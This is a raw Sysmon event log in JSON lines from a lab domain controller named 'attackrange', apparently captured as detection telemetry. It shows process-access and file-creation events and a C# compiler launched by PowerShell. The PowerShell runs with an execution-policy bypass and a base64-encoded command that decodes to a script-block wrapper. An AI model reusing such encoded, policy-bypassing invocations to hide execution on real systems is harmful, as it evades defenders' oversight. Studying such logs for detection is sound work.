C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:46.328","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5434,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:46.328\r\nSourceProcessGUID: {A837DB8D-032E-5F25-0000-001070530A00}\r\nSourceProcessId: 660\r\nSourceThreadId: 2988\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-032E-5F25-0000-00100E6E0A00}\r\nTargetProcessId: 4916\r\nTargetImage: C:\\Windows\\system32\\chcp.com\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:46.328","SourceProcessGUID":"{A837DB8D-032E-5F25-0000-001070530A00}","SourceProcessId":"660","SourceThreadId":"2988","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-032E-5F25-0000-00100E6E0A00}","TargetProcessId":"4916","TargetImage":"C:\\Windows\\system32\\chcp.com","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5435,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:52:46.781\r\nProcessGuid: {A837DB8D-032E-5F25-0000-00105B620A00}\r\nProcessId: 796\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\rnhc3lzn.dll\r\nCreationUtcTime: 2020-08-01 05:52:46.781","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:52:46.781","ProcessGuid":"{A837DB8D-032E-5F25-0000-00105B620A00}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\rnhc3lzn.dll","CreationUtcTime":"2020-08-01 05:52:46.781","EventReceivedTime":"2020-08-01 05:52:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5436,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:46.781\r\nProcessGuid: {A837DB8D-032E-5F25-0000-00105B620A00}\r\nProcessId: 796\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\rnhc3lzn.cmdline\r\nCreationUtcTime: 2020-08-01 05:52:46.781","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:46.781","ProcessGuid":"{A837DB8D-032E-5F25-0000-00105B620A00}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\rnhc3lzn.cmdline","CreationUtcTime":"2020-08-01 05:52:46.781","EventReceivedTime":"2020-08-01 05:52:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5437,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:46.794\r\nProcessGuid: {A837DB8D-032E-5F25-0000-0010AB730A00}\r\nProcessId: 2820\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nFileVersion: 4.7.2053.0 built by: NET47REL1\r\nDescription: Visual C# Command Line Compiler\r\nProduct: Microsoft® .NET Framework\r\nCompany: Microsoft Corporation\r\nOriginalFileName: csc.exe\r\nCommandLine: \"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\rnhc3lzn.cmdline\"\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {A837DB8D-032E-5F25-0000-0020CE520A00}\r\nLogonId: 0xA52CE\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=4360A98D8785625667D2574D2DD5C988,SHA256=F7DB25AA420C14C514690C1E943EC1E729596973E911B3445DFAD42FE958711D,IMPHASH=ED2AE001A3FDD84BDC04C99A98883A52\r\nParentProcessGuid: {A837DB8D-032E-5F25-0000-00105B620A00}\r\nParentProcessId: 796\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:46.794","ProcessGuid":"{A837DB8D-032E-5F25-0000-0010AB730A00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","FileVersion":"4.7.2053.0 built by: NET47REL1","Description":"Visual C# Command Line Compiler","Product":"Microsoft® .NET Framework","Company":"Microsoft Corporation","OriginalFileName":"csc.exe","CommandLine":"\"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\rnhc3lzn.cmdline\"","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{A837DB8D-032E-5F25-0000-0020CE520A00}","LogonId":"0xa52ce","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=4360A98D8785625667D2574D2DD5C988,SHA256=F7DB25AA420C14C514690C1E943EC1E729596973E911B3445DFAD42FE958711D,IMPHASH=ED2AE001A3FDD84BDC04C99A98883A52","ParentProcessGuid":"{A837DB8D-032E-5F25-0000-00105B620A00}","ParentProcessId":"796","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentCommandLine":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==","EventReceivedTime":"2020-08-01 05:52:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5438,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:46.781\r\nSourceProcessGUID: {A837DB8D-032E-5F25-0000-00105B620A00}\r\nSourceProcessId: 796\r\nSourceThreadId: 3932\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {A837DB8D-032E-5F25-0000-0010AB730A00}\r\nTargetProcessId: 2820\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+270222|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26fe9f|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26f9ee|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26f97a|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26e48b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+7c1ecb|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+7c1999|UNKNOWN(00007FFF447CB68F)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:46.781","SourceProcessGUID":"{A837DB8D-032E-5F25-0000-00105B620A00}","SourceProcessId":"796","SourceThreadId":"3932","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{A837DB8D-032E-5F25-0000-0010AB730A00}","TargetProcessId":"2820","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+270222|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26fe9f|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26f9ee|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26f97a|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26e48b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+7c1ecb|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+7c1999|UNKNOWN(00007FFF447CB68F)","EventReceivedTime":"2020-08-01 05:52:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5439,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:46.781\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-032E-5F25-0000-0010AB730A00}\r\nTargetProcessId: 2820\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:46.781","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-032E-5F25-0000-0010AB730A00}","TargetProcessId":"2820","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:52:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5440,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:46.781\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:46.781","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5441,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:46.781\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:46.781","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
